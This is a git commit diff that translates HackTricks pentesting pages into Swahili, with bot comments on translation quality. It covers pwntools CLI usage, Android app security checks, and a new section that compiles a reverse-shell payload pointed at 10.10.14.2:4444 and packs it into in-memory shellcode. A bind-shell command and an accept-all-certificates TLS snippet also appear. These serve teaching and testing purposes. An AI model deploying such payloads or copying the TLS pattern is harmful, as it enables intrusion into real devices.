Translated ['src/mobile-pentesting/android-app-pentesting/README.md', 's

Translator 2025-09-30 02:13:32 +00:00
parent ca3cb9c0e9
commit f2f39aaa1a
5 changed files with 496 additions and 330 deletions


@ -353,6 +353,7 @@
- [Frida Tutorial 3](mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md)
- [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
- [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
- [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md)
- [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
- [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
- [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)


@ -11,16 +11,16 @@ Pata **opcodes** kutoka kwa mstari au faili.
pwn asm "jmp esp"
pwn asm -i <filepath>
```
**Inaweza kuchagua:**
**Unaweza kuchagua:**
- aina ya pato (raw, hex, string, elf)
- muktadha wa faili la pato (16, 32, 64, linux, windows...)
- epuka bytes (mistari mipya, null, orodha)
- chagua encoder debug shellcode ukitumia gdb endesha pato
- aina ya output (raw,hex,string,elf)
- muktadha wa faili za output (16,32,64,linux,windows...)
- epuka bytes (new lines, null, a list)
- chagua encoder, debug shellcode kwa kutumia gdb na endesha output
## **Pwn checksec**
Script ya checksec
Skripti ya Checksec
```
pwn checksec <executable>
```
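Review bot: the new option list reverts terms the old lines had already translated ("new lines, null, a list" replaces "mistari mipya, null, orodha", and "output" replaces "pato"), so the list now mixes English and Swahili; either keep the Swahili terms or use the English CLI terms consistently across the whole file. The lead-in "**Unaweza kuchagua:**" here also becomes "**Inaweza kuchagua:**" in the cyclic, debug and phd sections of this same commit; settle on one phrasing.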
@ -33,22 +33,22 @@ Pata muundo
pwn cyclic 3000
pwn cyclic -l faad
```
**Inaweza kuchaguliwa:**
**Inaweza kuchagua:**
- Alfabeti inayotumika (herufi ndogo kwa chaguo-msingi)
- Urefu wa muundo wa kipekee (chaguo-msingi 4)
- muktadha (16,32,64,linux,windows...)
- Chukua ofseti (-l)
- Alfabeta inayotumika (herufi ndogo kwa chaguo-msingi)
- Urefu wa uniq pattern (chaguo-msingi 4)
- context (16,32,64,linux,windows...)
- Chukua offset (-l)
## Pwn debug
Unganisha GDB na mchakato
Unganisha GDB kwenye mchakato
```
pwn debug --exec /bin/bash
pwn debug --pid 1234
pwn debug --process bash
```
**Inaweza kuchaguliwa:**
**Inaweza kuchagua:**
- Kwa executable, kwa jina au kwa muktadha wa pid (16,32,64,linux,windows...)
- gdbscript ya kutekeleza
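Review bot: "Alfabeta inayotumika" introduces a spelling error the old line did not have; the Swahili word is "alfabeti", as in the replaced line. "context (16,32,64,...)" also replaces the already-translated "muktadha (16,32,64,...)", which is a regression in a translation commit.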
@ -62,25 +62,25 @@ pwn disablenx <filepath>
```
## Pwn disasm
Disas hex opcodes
Changanua opcodes za hex
```
pwn disasm ffe4
```
**Inaweza kuchaguliwa:**
**Unaweza kuchagua:**
- muktadha (16,32,64,linux,windows...)
- anwani ya msingi
- rangi (default)/hakuna rangi
- context (16,32,64,linux,windows...)
- base addres
- color(default)/no color
## Pwn elfdiff
Chapisha tofauti kati ya faili 2
Onyesha tofauti kati ya faili 2
```
pwn elfdiff <file1> <file2>
```
## Pwn hex
Pata uwakilishi wa hexadecimal
Pata uwakilishi wa heksadesimali
```bash
pwn hex hola #Get hex of "hola" ascii
```
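Review bot: "base addres" is misspelled ("base address"), and that line together with "context (...)" and "color(default)/no color" replaces Swahili items the old lines had ("anwani ya msingi", "muktadha", "rangi") with English; keep the old Swahili lines or translate all three consistently with the rest of the file.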
@ -90,11 +90,11 @@ Pata hexdump
```
pwn phd <file>
```
**Inaweza kuchaguliwa:**
**Inaweza kuchagua:**
- Idadi ya bytes za kuonyesha
- Idadi ya bytes kwa kila mstari wa kuangazia byte
- Kusaidia bytes mwanzoni
- Idadi ya bytes kwa kila mstari (byte ya kuangazia)
- Ruka bytes mwanzoni
## Pwn pwnstrip
@ -112,26 +112,26 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
```
**Inaweza kuchaguliwa:**
- shellcode na hoja za shellcode
- Faili ya nje
- muundo wa pato
- debug (unganishisha dbg na shellcode)
- kabla (trap ya debug kabla ya msimbo)
- shellcode na vigezo kwa ajili ya shellcode
- Faili ya pato
- Umbizo la pato
- debug (ambatisha dbg kwa shellcode)
- kabla (debug trap kabla ya code)
- baada
- epuka kutumia opcodes (default: si null na mstari mpya)
- epuka kutumia opcodes (chaguo-msingi: not null and new line)
- Endesha shellcode
- Rangi/hana rangi
- Rangi/hauna rangi
- orodhesha syscalls
- orodhesha shellcodes zinazowezekana
- Tengeneza ELF kama maktaba ya pamoja
- Tengeneza ELF kama shared library
## Pwn template
Pata kiolezo cha python
Pata template ya python
```
pwn template
```
**Inaweza kuchagua:** mwenyeji, bandari, mtumiaji, pass, njia na kimya
**Inaweza kuchagua:** host, port, user, pass, path and quiet
## Pwn unhex
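Review bot: "**Inaweza kuchagua:** host, port, user, pass, path and quiet" keeps the English conjunction inside a Swahili sentence; use "path na quiet". "Rangi/hauna rangi" is also awkward; "Rangi/bila rangi" is the natural reading of "color/no color".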
@ -139,10 +139,43 @@ Kutoka hex hadi string
```
pwn unhex 686f6c61
```
## Pwn update
## Sasisho la Pwn
Ili kusasisha pwntools
```
pwn update
```
## ELF → raw shellcode ufungashaji (loader_append)
Pwntools inaweza kubadilisha ELF huru kuwa blob moja la raw shellcode linalopanga mwenyewe sekimenti zake na kuhamisha execution kwa original entrypoint. Hii ni bora kwa memory-only loaders (mfano, Android apps zinazoita JNI kutekeleza downloaded bytes).
Mchakato wa kawaida (mfano amd64)
1) Jenga payload ELF imara, positionindependent (musl inashauriwa kwa uhamaji):
```bash
musl-gcc -O3 -s -static -o exploit exploit.c \
-DREV_SHELL_IP="\"10.10.14.2\"" -DREV_SHELL_PORT="\"4444\""
```
2) Geuza ELF → shellcode kwa pwntools:
```python
# exp2sc.py
from pwn import *
context.clear(arch='amd64')
elf = ELF('./exploit')
sc = asm(shellcraft.loader_append(elf.data, arch='amd64'))
open('sc','wb').write(sc)
print(f"ELF size={len(elf.data)} bytes, shellcode size={len(sc)} bytes")
```
3) Wasilisha sc kwa memory loader (mfano, via HTTP[S]) na uitekeleze ndani ya mchakato.
Vidokezo
- loader_append inaingiza programu asili ya ELF ndani ya shellcode na hutoa loader ndogo inayofanya mmaps kwa segments na kuruka kwenye entry.
- Kuwa wazi kuhusu usanifu kwa kutumia context.clear(arch=...). arm64 ni ya kawaida kwenye Android.
- Hakikisha code ya payload yako haitegemei nafasi (positionindependent) na usitegemeee dhana za ASLR/NX za mchakato.
## Marejeo
- [Pwntools](https://docs.pwntools.com/en/stable/)
- [CoRPhone ELF→shellcode pipeline used for Android in-memory execution](https://github.com/0xdevil/corphone)
{{#include ../../../banners/hacktricks-training.md}}
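Review bot: renaming "## Pwn update" to "## Sasisho la Pwn" breaks the "## Pwn <subcommand>" heading convention every other section keeps (including "## Pwn unhex" in this same hunk), and the heading no longer matches the literal command `pwn update` shown under it; keep the original heading. In the new loader_append section, "positionindependent" is missing its hyphen in both places it appears, and "usitegemeee" has an extra "e".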


@ -4,7 +4,7 @@
## Misingi ya Programu za Android
Inashauriwa sana kuanza kusoma ukurasa huu ili kujua kuhusu **vipengele muhimu zaidi vinavyohusiana na usalama wa Android na vipengele hatari zaidi katika programu ya Android**:
Inapendekezwa sana kuanza kusoma ukurasa huu ili kujua kuhusu sehemu muhimu zaidi zinazohusiana na usalama wa Android na sehemu hatari zaidi katika programu ya Android:
{{#ref}}
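Review bot: the new line drops the `**...**` emphasis around "vipengele muhimu zaidi vinavyohusiana na usalama wa Android ..." that the old line carried; the source markup should survive translation.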
@ -13,15 +13,15 @@ android-applications-basics.md
## ADB (Android Debug Bridge)
Hii ni zana kuu unayohitaji kuunganishwa na kifaa cha Android (imeigwa au halisi).\
**ADB** inaruhusu kudhibiti vifaa kwa njia ya **USB** au kupitia **Network** kutoka kwa kompyuta. Kifaa hiki kinawezesha **kunakili** faili kwa pande zote, **kufunga** na **kuondoa** apps, **kuendesha** amri za shell, **kufanya backup** ya data, **kusoma** logs, miongoni mwa kazi nyingine.
Hii ndiyo zana kuu unayohitaji kuunganishwa na kifaa cha Android (kilichoiga au cha kimwili).\
**ADB** inaruhusu kudhibiti vifaa kwa kutumia **USB** au **mtandao** kutoka kwa kompyuta. Huduma hii inafanya iwezekane **kunakili** faili pande zote mbili, **kufunga** na **kuondoa** apps, **kuendesha** amri za shell, **kusaidia kuhifadhi nakala** za data, **kusoma** logi, miongoni mwa kazi nyingine.
Tazama orodha ifuatayo ya [**ADB Commands**](adb-commands.md) ili ujifunze jinsi ya kutumia adb.
Tazama orodha ifuatayo ya [**ADB Commands**](adb-commands.md) ili kujifunza jinsi ya kutumia adb.
## Smali
Wakati mwingine ni muhimu **kubadilisha msimbo wa programu** ili kufikia **taarifa zilizofichwa** (labda nywila zilizofichwa vizuri au flags). Kisha, inaweza kuwa ya manufaa ku-decompile APK, kubadilisha msimbo na ku-recompile tena.\
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). Hii inaweza kuwa muhimu kama **mbadala kwa vipimo kadhaa wakati wa dynamic analysis** zitakazowasilishwa. Kwa hiyo, **kumbuka daima uwezekano huu**.
Wakati mwingine inavutia **kubadilisha msimbo wa programu** ili kupata **taarifa zilizofichwa** (labda nywila zilizoobfuscated vizuri au flags). Kisha, inaweza kuwa ya kuvutia ku-decompile APK, kubadilisha msimbo na ku-recompile yake.\
[**Katika tutorial hii** unaweza **kujifunza jinsi ya ku-decompile APK, kubadilisha msimbo wa Smali na ku-recompile APK** kwa uwezo mpya](smali-changes.md). Hii inaweza kuwa muhimu sana kama **mbadala kwa vipimo vingi wakati wa dynamic analysis** vitakavyowasilishwa. Kwa hivyo, **kumbuka kila wakati uwezekano huu**.
## Mbinu nyingine za kuvutia
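Review bot: "**kusaidia kuhifadhi nakala** za data" adds an unneeded "kusaidia" (the ADB capability is to back up data, not to help back it up); "kuhifadhi nakala za data" is enough. "na ku-recompile yake" at the end of the Smali paragraph is ungrammatical; "na kui-recompile" (or "na ku-recompile tena", as in the replaced line) is the natural form.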
@ -29,8 +29,8 @@ Wakati mwingine ni muhimu **kubadilisha msimbo wa programu** ili kufikia **taari
- [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md)
- [Exploiting Insecure In-App Update Mechanisms](insecure-in-app-update-rce.md)
- [Abusing Accessibility Services (Android RAT)](accessibility-services-abuse.md)
- **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
- Chomoa APK kutoka kwenye kifaa:
- **Pakua APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
- Toa APK kutoka kwenye kifaa:
```bash
adb shell pm list packages
com.android.insecurebankv2
@ -49,7 +49,7 @@ java -jar ../APKEditor.jar m -i splits/ -o merged.apk
# after merging, you will need to align and sign the apk, personally, I like to use the uberapksigner
java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
```
## Masomo ya Kesi & Udhaifu
## Mfano za Kesi & Udhaifu
{{#ref}}
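Review bot: "## Mfano za Kesi & Udhaifu" has a noun/concord mismatch; "mfano" is an m-/mi- class noun, so the plural heading is "Mifano ya Kesi & Udhaifu". The replaced "Masomo ya Kesi" ("case studies") was also closer to the English heading.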
@ -61,41 +61,41 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
../../linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
{{#endref}}
## Uchambuzi wa Statiki
## Uchambuzi wa Static
Kwanza kabisa, kwa kuchambua APK unapaswa **kutazama Java code** kwa kutumia decompiler.\
Tafadhali, [**soma hapa kupata taarifa kuhusu decompilers tofauti zilizopo**](apk-decompilers.md).
Kwanza kabisa, kwa kuchambua APK unapaswa **kutazama msimbo wa Java** kwa kutumia decompiler.\
Tafadhali, [**soma hapa kupata taarifa kuhusu decompilers mbalimbali zinazopatikana**](apk-decompilers.md).
### Kutafuta Taarifa Zinazovutia
### Kutafuta Habari Zenye Kuvutia
Kwa kuangalia tu **strings** za APK unaweza kutafuta **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** na chochote kinachovutia... hata tazama kwa ajili ya code execution **backdoors** au authentication backdoors (hardcoded admin credentials kwa app).
Kwa kuangalia tu **strings** za APK unaweza kutafuta **nywila**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api keys**, **usimbaji**, **bluetooth uuids**, **tokens** na chochote kinachovutia... hata tafuta code execution **backdoors** au authentication backdoors (credentials za admin zilizowekwa ndani ya app).
**Firebase**
Lipa makini kwa **firebase URLs** na angalia kama imewekwa vibaya. [Taarifa zaidi kuhusu ni nini Firebase na jinsi ya exploit hapa.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
Lipa tahadhari maalum kwa **Firebase URLs** na angalia kama imewekwa vibaya. [Taarifa zaidi kuhusu ni nini Firebase na jinsi ya kuiexploit hapa.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
### Uelewa wa msingi wa application - Manifest.xml, strings.xml
### Ufahamu wa msingi wa programu - Manifest.xml, strings.xml
Uchunguzi wa faili za programu _Manifest.xml_ na **_strings.xml_** unaweza kufumbua udhaifu wa usalama. Faili hizi zinaweza kupatikana kwa kutumia decompilers au kwa kubadilisha extension ya faili APK kuwa .zip kisha kuizipua.
Ukaguzi wa faili za programu _Manifest.xml_ na _strings.xml_ unaweza kufunua udhaifu wa usalama. Faili hizi zinaweza kufikiwa kwa kutumia decompilers au kwa kubadilisha nyongeza ya faili ya APK kuwa .zip kisha kuizifungua.
**Udahifu** unaotambulika kutoka **Manifest.xml** ni pamoja na:
**Udhaifu** uliotambuliwa kutoka kwa **Manifest.xml** ni pamoja na:
- **Debuggable Applications**: Applications zilizowekwa kama debuggable (`debuggable="true"`) katika faili _Manifest.xml_ zina hatari kwa kuwa zinaruhusu connections ambazo zinaweza kusababisha exploit. Kwa ufahamu zaidi juu ya jinsi ya exploit debuggable applications, rejea tutorial juu ya kupata na ku-exploit debuggable applications kwenye kifaa.
- **Backup Settings**: `android:allowBackup="false"` inapaswa kuwekwa wazi kwa applications zinazosimamia taarifa nyeti ili kuzuia backups zisizoidhinishwa za data kupitia adb, hasa wakati usb debugging imewezeshwa.
- **Network Security**: Mipangilio maalumu ya network security (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ inaweza kubainisha maelezo ya usalama kama certificate pins na mipangilio ya HTTP traffic. Mfano ni kuruhusu HTTP traffic kwa domains maalum.
- **Exported Activities and Services**: Kutambua exported activities na services katika manifest kunaweza kuonyesha components zinazoweza kutumiwa vibaya. Uchambuzi zaidi wakati wa testing ya dynamic unaweza kufichua jinsi ya exploit components hizi.
- **Content Providers and FileProviders**: Content providers zilizofunuliwa zinaweza kuruhusu access au modification ya data bila idhini. Usanidi wa FileProviders pia unapaswa kuchunguzwa.
- **Broadcast Receivers and URL Schemes**: Components hizi zinaweza kutumika kwa exploitation, hasa kuzingatia jinsi URL schemes zinavyosimamiwa kwa ajili ya input vulnerabilities.
- **SDK Versions**: `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo za Android zinazotumika, zikionyesha umuhimu wa kuto-support outdated, vulnerable Android versions kwa sababu za usalama.
- **Maombi yanayoweza kudebugiwa**: Maombi yaliyowekwa kama debuggable (`debuggable="true"`) katika _Manifest.xml_ yanaweka hatari kwa sababu yanaruhusu muunganisho ambao unaweza kusababisha exploit. Kwa kuelewa zaidi juu ya jinsi ya kuiexploit debuggable applications, rejea somo kuhusu kutafuta na kutumia debuggable applications kwenye kifaa.
- **Mipangilio ya Backup**: Sifa `android:allowBackup="false"` inapaswa kuwekwa wazi kwa maombi yanayoshughulikia taarifa nyeti ili kuzuia backups zisizoidhinishwa kupitia adb, hasa wakati usb debugging imewezeshwa.
- **Usalama wa Mtandao**: Mipangilio ya kawaida ya usalama wa mtandao (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ inaweza kutaja maelezo ya usalama kama certificate pins na mipangilio ya trafiki ya HTTP. Mfano ni kuruhusu trafiki ya HTTP kwa domini maalum.
- **Exported Activities na Services**: Kutambua activities na services zilizo exported katika manifest kunaweza kuonyesha vipengele vinavyoweza kutumika vibaya. Uchambuzi zaidi wakati wa mtihani wa dynamique unaweza kufichua jinsi ya kuiexploit vipengele hivi.
- **Content Providers na FileProviders**: Content providers zilizo wazi zinaweza kuruhusu upatikanaji au urekebishaji wa data bila idhini. Usanidi wa FileProviders pia unapaswa kuchunguzwa kwa umakini.
- **Broadcast Receivers na URL Schemes**: Vipengele hivi vinaweza kutumika kwa matumizi ya udanganyifu, kwa kutilia mkazo jinsi URL schemes zinavyosimamiwa kwa udhaifu wa input.
- **SDK Versions**: Sifa za `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo la Android linaloungwa mkono, zikionyesha umuhimu wa kuto support version za zamani ambazo zinaweza kuwa zenye udhaifu kwa masuala ya usalama.
Kutoka kwenye faili **strings.xml**, taarifa nyeti kama API keys, custom schemas, na maelezo mengine ya developer yanaweza kupatikana, ikisisitiza umuhimu wa kupitia kwa uangalifu rasilimali hizi.
Kutoka kwa faili ya **strings.xml**, taarifa nyeti kama API keys, custom schemas, na maelezo mengine ya watengenezaji zinaweza kugunduliwa, ikisisitiza umuhimu wa mapitio ya kina ya rasilimali hizi.
### Tapjacking
**Tapjacking** ni shambulio ambapo **malicious application** inaanzishwa na kujipanga juu ya application ya mwathiriwa. Mara inapoficha kimaso app ya mwathiriwa, interface yake ya mtumiaji imeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, huku ikiendelea kupitisha interaction kwa app ya mwathiriwa.\
Kwa ufanisi, inamtia doa mtumiaji kujua kuwa kwa kweli anafanya vitendo kwenye app ya mwathiriwa.
**Tapjacking** ni shambulio ambapo **application** **hasidi** inaanzishwa na **kujipanga juu ya application ya mwathiriwa**. Mara inapoificha app ya mwathiriwa, kiolesura chake kimeundwa kwa njia ambayo kinamdanganya mtumiaji kufanya mwingiliano nayo, wakati inapitisha mwingiliano huo kwa app ya mwathiriwa.\
Kwa ufanisi, inamficha mtumiaji kwamba kwa kweli anafanya vitendo kwenye app ya mwathiriwa.
Find more information in:
Pata habari zaidi katika:
{{#ref}}
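Review bot: "mtihani wa dynamique" puts a French word in a Swahili sentence; use "dynamic" as the rest of the file does. "kuto support" should be one word ("kutosupport") or the Swahili "kutounga mkono". Independently of the translation, both the old and the new "SDK Versions" lines spell the attribute `targetSDKVersion`; the manifest attribute is `android:targetSdkVersion`, so the upstream text needs the same correction.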
@ -104,9 +104,9 @@ tapjacking.md
### Task Hijacking
Activity yenye `launchMode` imewekwa `singleTask` bila `taskAffinity` yoyote imeelezwa kuwa inakabiliwa na task Hijacking. Hii inamaanisha, that application inaweza kusanikishwa na ikiwa itaanzishwa kabla ya application halisi inaweza hijack task ya application halisi (kwa hivyo mtumiaji ataingiliana na **malicious application** akidhani anatumia ile halisi).
Activity yenye **`launchMode`** imewekwa kuwa **`singleTask` bila `taskAffinity`** imefafanuliwa imeathirika kwa task Hijacking. Hii inamaanisha, kwamba application inaweza kusanikishwa na ikiwa itaendeshwa kabla ya application halisi inaweza **kuhijack task ya application halisi** (hivyo mtumiaji atakuwa anaingiliana na **application hasidi akidhani anatumia ile halisi**).
More info in:
Taarifa zaidi katika:
{{#ref}}
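Review bot: "bila `taskAffinity` imefafanuliwa imeathirika kwa task Hijacking" is missing the complementizer; "imefafanuliwa kuwa imeathirika na task Hijacking" reads correctly.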
@ -115,67 +115,67 @@ android-task-hijacking.md
### Uhifadhi wa data usio salama
**Internal Storage**
Internal Storage
Kwenye Android, files zilizohifadhiwa kwenye internal storage zimedesignwa kupatikana pekee na app iliyozitengeneza. Kipimo hiki cha usalama kinafanywa na mfumo wa uendeshaji wa Android na kwa ujumla kinatosha kwa mahitaji ya usalama ya applications nyingi. Hata hivyo, developers wakati mwingine hutumia modes kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu files kushirikiwa kati ya applications tofauti. Modes hizi hazizuizi access kwa files hizo na applications nyingine, ikiwa ni pamoja na zile zinazoweza kuwa malicious.
Katika Android, faili zilizohifadhiwa katika uhifadhi wa ndani zimetengenezwa kuwa kufikika pekee na app iliyozitengeneza. Kipimo hiki cha usalama kinatekelezwa na mfumo wa uendeshaji wa Android na kwa kawaida kinatosheleza mahitaji ya usalama ya wengi wa maombi. Hata hivyo, watengenezaji wakati mwingine hutumia modes kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu faili kushirikishwa kati ya maombi tofauti. Mode hizi hazizuii upatikanaji wa faili hizi na maombi mengine, ikijumuisha yale ambayo yanaweza kuwa na nia mbaya.
1. **Static Analysis:**
- **Hakikisha** kuwa matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Modes hizi **zinaweza kufunua** files kwa access isiyokusudiwa au isiyoidhinishwa.
2. **Dynamic Analysis:**
- **Thibitisha** permissions zilizo kwenye files zilizotengenezwa na app. Haswa, **angalia** kama kuna files zilizowekwa kuwa readable au writable kwa wote. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaruhusu **application yoyote** iliyosanikishwa kwenye kifaa, bila kujali asili au nia yake, kusoma au kubadilisha files hizi.
1. **Uchambuzi wa Static:**
- **Hakikisha** kwamba matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Mode hizi **zinaweza kufichua** faili kwa upatikanaji usiotarajiwa au usioidhinishwa.
2. **Uchambuzi wa Dynamic:**
- **Thibitisha** ruhusa zilizowekwa kwenye faili zilizotengenezwa na app. Hasa, **angalia** kama faili yoyote imewekwa kuwa readable au writable kwa wote. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaweka uwezo kwa **app yoyote** iliyosakinishwa kwenye kifaa, bila kujali asili yake au nia, kusoma au kubadilisha faili hizi.
**External Storage**
External Storage
Unaposhughulika na files kwenye external storage, kama SD Cards, tahadhari fulani zinapaswa kuchukuliwa:
Wakati wa kushughulikia faili kwenye external storage, kama SD Cards, tahadhari fulani zinapaswa kuchukuliwa:
1. **Accessibility**:
- Files kwenye external storage ni **globally readable and writable**. Hii inamaanisha application yoyote au mtumiaji anaweza kufikia files hizi.
2. **Security Concerns**:
- Kwa kuzingatia urahisi wa upatikanaji, inashauriwa **kutoweka taarifa nyeti** kwenye external storage.
- External storage inaweza kuondolewa au kufikiwa na application yoyote, ikifanya isiwe na usalama wa kutosha.
3. **Handling Data from External Storage**:
- Daima **fanya input validation** kwa data inayopatikana kutoka external storage. Hii ni muhimu kwa sababu data inatoka kwa chanzo kisichotegemewa.
- Kuingiza executables au class files kwenye external storage kwa ajili ya dynamic loading haipendekeziwi.
- Ikiwa application yako lazima ichukue executable files kutoka external storage, hakikisha files hizi zinasainiwa na kuthibitishwa kwa cryptography kabla ya kuzindua kwa dynamically. Hatua hii ni muhimu kwa kudumisha uadilifu wa usalama wa application yako.
1. **Upatikanaji**:
- Faili kwenye external storage ni **zinazosomeka na kuandikwa na wote**. Hii inamaanisha app yoyote au mtumiaji anaweza kufikia faili hizi.
2. **Mambo ya Usalama**:
- Kwa kuzingatia urahisi wa upatikanaji, inashauriwa **kuto hifadhi taarifa nyeti** kwenye external storage.
- External storage inaweza kuondolewa au kufikiwa na app yoyote, ikifanya isiwe salama.
3. **Kuendesha Data kutoka External Storage**:
- Daima **fanya uthibitishaji wa input** juu ya data inayorekebishwa kutoka external storage. Hii ni muhimu kwa sababu data inatoka kwa chanzo kisichotegemewa.
- Hifadhi ya executables au class files kwenye external storage kwa ajili ya dynamic loading haipendekezwi.
- Ikiwa app yako lazima ipokee faili za executable kutoka external storage, hakikisha faili hizi zimesainiwa na kuthibitishwa kificho kabla ya kupakiwa kwa njia ya dynamic. Hatua hii ni muhimu kwa kudumisha uadilifu wa usalama wa app yako.
External storage inaweza kupatikana katika `/storage/emulated/0` , `/sdcard` , `/mnt/sdcard`
External storage inaweza kufikiwa katika `/storage/emulated/0` , `/sdcard` , `/mnt/sdcard`
> [!TIP]
> Kuanzia Android 4.4 (**API 17**), SD card ina muundo wa directory ambao unazuia access kutoka app hadi directory ambayo ni maalum kwa app hiyo. Hii inazuia malicious application kupata read au write access kwa files za app nyingine.
> Kuanzia na Android 4.4 (**API 17**), SD card ina muundo wa directories unaopunguza upatikanaji wa app hadi directory ambayo ni maalum kwa app hiyo. Hii inazuia application hasidi kupata upatikanaji wa kusoma au kuandika kwa faili za app nyingine.
**Taarifa nyeti zilizohifadhiwa kwa clear-text**
**Taarifa nyeti zilizohifadhiwa kwa maandishi wazi**
- **Shared preferences**: Android inaruhusu kila application kuweka kwa urahisi xml files katika njia `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Databases**: Android inaruhusu kila application kuhifadhi sqlite databases katika njia `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Shared preferences**: Android inaruhusu kila application kuhifadhi kwa urahisi faili za xml katika njia `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti kwa maandishi wazi katika folder hiyo.
- **Databases**: Android inaruhusu kila application kuhifadhi kwa urahisi sqlite databases katika njia `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa maandishi wazi katika folder hiyo.
### Broken TLS
**Accept All Certificates**
Kwa sababu fulani wakati mwingine developers hukubali certificates zote hata kama kwa mfano hostname haifai na mistari ya code kama ifuatayo:
Kwa sababu fulani wakati mwingine watengenezaji wanakubali certificates zote hata kama kwa mfano hostname haifanani na mistari ya msimbo kama ifuatavyo:
```java
SSLSocketFactory sf = new cc(trustStore);
sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
```
A good way to test this is to try to capture the traffic using some proxy like Burp without authorising Burp CA inside the device. Also, you can generate with Burp a certificate for a different hostname and use it.
Njia nzuri ya kujaribu hili ni kujaribu kunasa trafiki kwa kutumia proxy kama Burp bila kuidhinisha Burp CA ndani ya kifaa. Pia, unaweza kuunda na Burp cheti kwa hostname tofauti na kukitumia.
### Broken Cryptography
### Kriptografia Iliyovunjika
**Mchakato duni wa Usimamizi wa Funguo**
**Mchakato duni wa usimamizi wa funguo**
Baadhi ya developers huhifadhi data nyeti kwenye local storage na kuizificha kwa key iliyowekwa/kutabirika ndani ya code. Hii haipaswi kufanywa kwani reverse engineering inaweza kumruhusu attacker kutoa taarifa za siri.
Baadhi ya watengenezaji huhifadhi data nyeti kwenye local storage na kuiencrypt kwa kutumia funguo zilizowekwa moja kwa moja / predictable katika code. Hii haipaswi kufanywa kwani reversing inaweza kumruhusu mshambuliaji kutoa taarifa za siri.
**Matumizi ya Algorithms Yasiyo Salama na/au Zilizokataliwa**
**Matumizi ya Algorithimu Hatari na/au Zilizopitwa na Wakati**
Developers hawapaswi kutumia **deprecated algorithms** kufanya ukaguzi wa **authorisation checks**, **kuhifadhi** au **kutuma** data. Baadhi ya algorithms ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zimetumika kuhifadhi nywila kwa mfano, inapaswa kutumika hashes ambazo zinastahimili brute-force kwa kutumia salt.
Watengenezaji hawapaswi kutumia **deprecated algorithms** kufanya authorisation **checks**, **store** au **send** data. Baadhi ya algorithms hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumiwa kuhifadhi passwords kwa mfano, inapaswa kutumiwa hashes ambazo zina upinzani dhidi ya brute-force pamoja na salt.
### Other checks
### Mambo mengine ya kuangalia
- It's recommended to **obfuscate the APK** to difficult the reverse engineer labour to attackers.
- If the app is sensitive (like bank apps), it should perform it's **own checks to see if the mobile is rooted** and act in consequence.
- If the app is sensitive (like bank apps), it should check if an **emulator** is being used.
- If the app is sensitive (like bank apps), it should **check it's own integrity before executing** it to check if it was modified.
- Use [**APKiD**](https://github.com/rednaga/APKiD) to check which compiler/packer/obfuscator was used to build the APK
- Inapendekezwa **obfuscate the APK** ili kufanya kazi ya reverse engineer kuwa ngumu kwa mashambuliaji.
- Ikiwa app ni nyeti (kama bank apps), inapaswa kufanya check zake mwenyewe kuona kama mobile ime-rooted na kuchukua hatua ipasavyo.
- Ikiwa app ni nyeti (kama bank apps), inapaswa kuhakiki kama emulator inatumika.
- Ikiwa app ni nyeti (kama bank apps), inapaswa **check it's own integrity before executing** ili kuona kama ilibadilishwa.
